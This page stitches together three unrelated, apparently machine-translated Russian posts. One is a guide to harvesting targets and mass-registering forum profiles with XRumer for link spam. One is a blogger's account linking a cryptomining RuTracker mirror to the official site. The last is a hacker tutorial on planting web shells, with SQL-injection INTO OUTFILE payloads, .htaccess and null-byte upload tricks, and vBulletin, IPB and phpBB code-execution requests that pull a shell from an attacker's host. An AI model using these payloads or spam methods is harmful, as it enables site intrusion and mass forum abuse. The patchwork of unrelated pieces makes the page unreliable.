A tricky way to collect a high-quality punchable base for XRUMER
Hi all! It's no secret that no matter how wonderful the software for mass registration/mailing is, without the proper quality of databases it has almost no value. Bases can be obtained different ways– parse it yourself / buy / find in public / etc. Each option is good in its own way and each of them has its own pros and cons.
Public base. The main advantage is that it is free. Often, purchased databases are also merged into the public, so you can still find worthwhile ones, another thing is that a large number of webmasters will work on these databases at once (both from individuals and from broken people) and they will quickly turn into a trash heap, and as you know , 1 trust link is often better than 1000 from shitty sites.
Buying a base. It's basically a lottery. There are now a sufficient number of sellers, but there are even more hucksters who buy and resell databases, passing them off as their own. This method of obtaining a database is good if you value your time and buy a database from a time-tested person.
Self-parsing. The best, but at the same time expensive option. For successful parsing, you need to have a dictionary on the topic, features for parsing + fresh proxies/soxes if you are planning to parse Google, for example. Of course, you also need the parser itself, for the hrumer everything is simpler, since the hrumer comes with Hrefer, but still I recommended buying something extra. Personally, I use webparser, although many praise a-parser, in general, who is good at what and who has what needs.
A database collected by yourself gives a slight temporary advantage over other webmasters, but you should not think that if you collect, say, a database of forums based on good features, you will not find spam from “brothers in arms” on a good half of them, but in any case, freshly scraped (raw) databases will be Public is better and often better than purchased ones, but as they say, this option is for those who have good hardware capabilities + time.
There are, of course, other options - steal from someone else’s server, parse the Internet using something like this request
Example of a lot in telderi:
_http://www.telderi.ru/ru/viewsite/67448
As we can see: “also run through profiles, run through profiles and catalogs was carried out 30 days ago,” which means this is “our client.” Copy the site URL to your text file.
In this simple way, we collect a BASE of sites that have ever been run through trust sites using Hroomer or manually. I would like to note the fact that most runners work with the default hroomer without a modified xas_AI.txt file, which again works to our advantage.
In literally an hour, you can collect about 200 website URLs that were “stained” by a direct run by Hrumer. Next, we go to replenish the collection on SEO forums, there we look for topics with runs and look at reviews, there are plenty of forums, for example:
_http://www.maultalk.com/forum38.html
Next, we go through the popular threads of the providers and look in the threads of those who left reviews about the service. In 85% of cases, if they have the website field in their profile and signature filled in, then their website is there, through which they ordered a run, and often more than one.
The work of collecting such URLs is a little tedious, but the effect will be worthy (for now, take my word for it).
After 2-3 hours of work, which can be outsourced to a smart student for 100-150 rubles from , we get a decent list of sites, now it’s just a matter of getting backlinks.
First, go to _ http://ahrefs.com and (you can use other software/services) and extract ALL backlinks.
It is also better to entrust this tedious work to someone.
The second stage will be preparing URLs for parsing, and here again comes a little trick.
You need to create queries for PARSING that look something like this, I’ll give an example for a website
“View profile” https://site/
“Profile” https://site/
“User profile” https://site/
“User” https://site/
“Site” https://site/
“Home page” https://site/
"user" https://site/
"member" https://site/
"profile" https://site/
Just enter the domain name in quotes “https://site”
Just browse the forums and see what the profiles look like there.
EXCEL and the operator will help you make a list of such signs and URLs &
In one column you have URLs, in the other our simple “signs”:
An illustrative example:
>>>> <<<<
What do we get as an output? A database of profiles in a 100% Yandex or Google index, most of which break through the default hroomer.
With such simple signs we parse the PS (I usually limit myself to Yasha and Gosha)
Of course, many duplicates will be collected in this way, but the profile database will be quite high-quality and indexable. Never chase quantity, it is better to buy/collect a database of 1000 profiles that are included in the index than from 40,000 that are closed in indexing, etc.
Main part (2): In the article about I mentioned that with the help of these 3 bases you can put together a good base for hroomer and I didn’t lie to you.
First, you should download all 3 databases – ru, su, RF:
https://partner.r01.ru/ru_domains.gz
https://partner.r01.ru/su_domains.gz
https://partner.r01.ru/rf_domains.gz
Next, compose them into 1 large file with URLs. ATTENTION! This operation requires large hardware capacity, if you do not have it, divide the database into pieces using KeyWordKeeper(you can download it from the link – _) and continue.
After creating a large database, we will in any case have to resort to the help of KeyWordKeeper, since everyone’s favorite EXCEL does not work well with files with more than 1,000,000 lines, so we divide our database into pieces of 900,000 each. This will result in quite a lot of files.
Now you need to turn your head on and think about which designs are most often applicable for forums.
The database already contains a decent number of forums, but often forums are created on subdomains of the main site and are not included in the database.
What do subdomains generally look like?
Site.ru /forum
Site.ru /talk
Forum. Site.ru
Talk. site.ru
+ other variations. Accordingly, we need to add talk and forum to the existing URLs, this is done with the same Excel operator &
+ press CTRL + ENTER to apply the formula to the entire list.
Now the best part, at the end of the working day, we compile everything we have done into 1 large file, mix it and launch the hroomer in the “registration only” mode.
Considering that the base is crude + many resources simply do not exist, we only assume that there are subdomains with forums there, with 100 threads and a 6 megabit channel the speed will be about 1200-1600 links (+ a lot depends on the hardware), those with With hardware and the channel, things are better; they will run through this base in a couple of days, but for the rest it will take about a little over a week. The second step is to start editing the profile.
As a result, you get a ~65% Russian-language database of profiles, consisting of ~8000-9000 resources (I got about that many), where a link like “https://site/” is simply put in, active and not closed for indexing links will be in 3-4 times less. This method collects not only forum profiles, but also profiles on the DLE engine, etc. If you approach the matter thoroughly - find many sites + do runs several times to squeeze the maximum out of the database - then you can squeeze out another 15-20% of resources from above.
The method can be upgraded and used to collect resources of any type. Article first designed for beginners who are just learning how to assemble databases and allows you to assemble a database in 1 day of preparation that can be used for several months.
For those who don’t want to bother with this matter, they can buy from me a personal database of 13,000 profiles, collected using this method with the addition of resources from YAK and DMOZ + other sources (I haven’t decided on the price tag yet, but if there is demand, I think 20 -25 WMZ is quite a reasonable price).
I hope the article was useful to you. I apologize in advance for the poor preview of screenshots + lack of video material, I will try to improve it over time.
Have a nice day, everyone!
I wrote that when you try to log in to one of the RuTracker mirrors, you receive a message stating that this is only possible if you allow the site to perform calculations on your computer, in other words, to mine cryptocurrency.
After that, I received angry messages in the comments that I was really a fool, and that the mirrors I was describing did not belong to the root tracker and were in no way connected with the root tracker itself. I didn’t attach much importance to this and in the comments to that note I asked the question, but what about the fact that the mirror rutracker-org.appspot.com repeats not only the design of the official website of the rutracker rutracker.org, but also completely repeats its contents. However, in response to this I heard that, I quote: " You are a fool Volokh and you don’t understand anything".
As befits a sane person, he begins to think about the following: If they tell me that I'm a fool, then maybe that's true? I thought so too, but it turned out that no - in this situation I’m not a fool. But first things first.
After RuTracker admins started saying in the comments that:
We have no other mirrors or “child projects”! All other root tracker “clones” that duplicate our structure and design have nothing to do with us, their use can lead to the theft of passwords, the use of your computer for cryptocurrency mining and other troubles! Maintracker is also a fake!!
I began to think, maybe I really got carried away and was in vain slandering the guys from RuTracker. Okay, I decided to compare comments from the official RuTracker website - rutracker.org and comments from the rutracker mirror rutracker-org.appspot.com, which requested permission to generate cryptocurrency. It turned out that the comments are completely identical. But no one will believe me, I decided, and wanted to take screenshots. But this idea also seemed stupid, because... comments can be easily deleted and edited.
The best idea was to record a video. Let’s take a look, and then I’ll comment on what’s happening here:
Have you looked? I’ll say right away that I present the video “as it is,” that is, without editing. Therefore, it is without any comments or voiceover. So let's figure out what's going on here.
To begin with, I created a mailbox to register on the site rutracker-org.appspot.com. Yes, exactly on the site that mines cryptocurrency. Why on it and not on the official website? rutracker.org? The fact is that I was faced with the task of showing what the sites rutracker-org.appspot.com And rutracker.org one database, that is, these sites are interconnected, contrary to the statements of the root tracker administrators.
After I opened my email, I opened the Tor browser and loaded three tabs:
1. Official website rutracker.org;
2. Mirror RuTracker rutracker-org.appspot.com;
3. Tab with an open mailbox.
After this, on the RuTracker mirror rutracker-org.appspot.com I registered (Time 00:25) and an account activation email arrived in my mailbox (Time 00:57). And here interesting dances begin, or rather creepy dances with the site administrators’ butts burning: the activation code contains a link to the tracker’s official website (Time 1:00):
https://rutracker.org/forum/profile.php?mode=activate&u=43055955&act_key=nUMiXqWX19EF
This link is working and it leads directly to the official website rutracker.org. By clicking on the link, the account created on the mirror rutracker-org.appspot.com successfully activated on the official website rutracker.org(Time 1:06). Into the wonders of technology and the admin's miraculous thoughts. It seems that something is starting to smoke for the site administrators. Well, okay, I’m a fool, as they said, what to take from me. Go ahead.
After successfully activating my account, I go to the mirror rutracker-org.appspot.com and try to log in to the site (Time 1:45). After entering the captcha, I successfully log in using the created account on the “unofficial” tracker (Time 2:03). And at this moment the same notification appears (Time 2:07):
I click on the "Allow" button (Time 2:08) because otherwise I would not be able to log in. After that, I show that the personal account is empty and I have not left any comments yet (Time 2:20).
Now, in order to show the relationship between the mirror and the official website, I choose a random distribution on the site rutracker-org.appspot.com and leave a comment (Time 3:10). After which, on the official website rutracker.org I try to log in (Time 3:40) with an account created on the root tracker mirror. And lo and behold, the login and password from the “unofficial” mirror came up with the official website (Time 4:00). Coincidence? Don't think.
Let's go further, open the list of messages left on the tracker and what we see: a familiar distribution in the list of topics (Time 4:05). Probably also a coincidence, and for greater persuasiveness I open the comment I left on this distribution on a mirror not recognized by the admins (Time 4:17).
Comparing the comment to the distribution from the site rutracker-org.appspot.com And rutracker.org(Time 5.54) and once again we are convinced that these two sites are interconnected.
What did the site administrators write to me? It seems they convinced me that the official website and mirror rutracker-org.appspot.com are not interconnected in any way. The comments of the tracker admins clearly state that all mirrors simply duplicate the structure and design of the site, but are not interconnected. However, from what we saw, it turns out that the official website copies comments from some left-wing mirror? No, that's also nonsense. Where is the truth? The truth is that these two sites have one database, and there are many mirrors, some of which are recognized by the tracker administrators, while others are not recognized and are used to generate cryptocurrency.
It turns out that all this time, in the comments they were trying to pour some nonsense into my ears and convince me that I allegedly went to a completely wrong site, but in fact it turned out that this site also belongs to RuTracker.
I suspect that now some people will begin to experience inflammation of the fifth point and will be showered with threats, insults, etc. But I really already thought that it was in vain to attack the guys and they were not to blame for anything. It turned out to be completely different and the video is proof of that. As a colleague said: RuTracker - you were like a brother to me.
Hello %username% and his friends. Well, you urgently need to upload a shell to the site, well, you never know, maybe the final fee depends on it. Well, it just doesn’t work out. Here I collected a couple of examples (thanks to Tracy and others for this).
Let's pour the shell through the picture
You have hacked a site (of course you are only testing) with a custom admin panel... And you cannot upload a web shell, but there is an upload of pictures and only loads .jpg, .gif, .png formats.
What can be done in this case?
We shove the shell with the extension .gif into some folder with pictures, and create a .htaccess file with the contents
AddType application/x-httpd-php .gif
This command will execute the .gif format as php
Trying to open /shell.gif
Also, if the script is not indifferent to line breaks, we try to flood the shell, simultaneously renaming it to shell.php%00.jpg, check the availability of shell.php, what if?
Method for loading a shell via mysql.user from whine
1) Let’s find out who we are sitting under and also find out his rights to mysql.
site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Let's find out who we're sitting under)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" our user
"+--+
(Let's check the privileges of our user. If it gives an error during the output, you can hex our user 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+" Path to file
"+--+
(Fill in the mini-shell)
P.S.
For everything to work, you need to have write rights and know the full path to the root.
You can also check write permissions like this:
site.com/index.php?id=1+and+1=0+union+Select+1," prava
",3+from+mysql.user+--+
If prava is displayed, then you have rights.
The following situation. We are in the admin panel of the vBulletin forum engine
Let's go:
Plugins & Products -> Plugin Manager -> Plugins & Products -> Plugin Manager -> [Add New Plugin]
Select templates. Usually we select faq_complete, select and click the Plugin is Active checkbox, set it to “Yes” and save.
localhost/forum/faq.php?cmd=phpinfo();
If we have printed phpinfo() then consider the shell in our hands.
Next in phpinfo you need to find the full path to the forum (for example /home/u0000/site.ru/www/sell.php). Next we need to turn our web shell into txt file and upload it to any website
mysite.com/shell.txt
Fill shell with command
localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
What does this team do? It copies the contents of variable [a] to variable [b], that is, shell.txt is copied to shell.php
Loading the shell into IPB 3
Let's go:Support->SQL Management->Running Processes->Run New Query
Code:
select 0x3c3f706870696e666f28293b3f3e into outfile "Z:/home/site.ru/www/uploads/shell.php"
You can see the full path like this:
Admin->Support
It will be written on top PHP version and on the left is a link to PHPINFO
Shell here:
http://site.com/uploads/shell.php
Uploading the shell to phpBB 2
1. Create the ex.sql file
2. Register there
UPDATE phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Where user_id=2 is the administrator ID
3. Go to the admin panel
4. In the admin panel, select the “Restore DB” item and download ex.sql
5. Execute the code / Fill the shell like this
Let's go:
http://target/profile.php?mode=editprofile&e=phpinfo();
After:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
To display phpinfo() you need to be logged in.
This is just a short list of how and on which engines the shell can be loaded. Need more? Welcome to the guys at rdot
uploading to forums
filling on cms
And here is my favorite shell, also on rdot))
Loading...
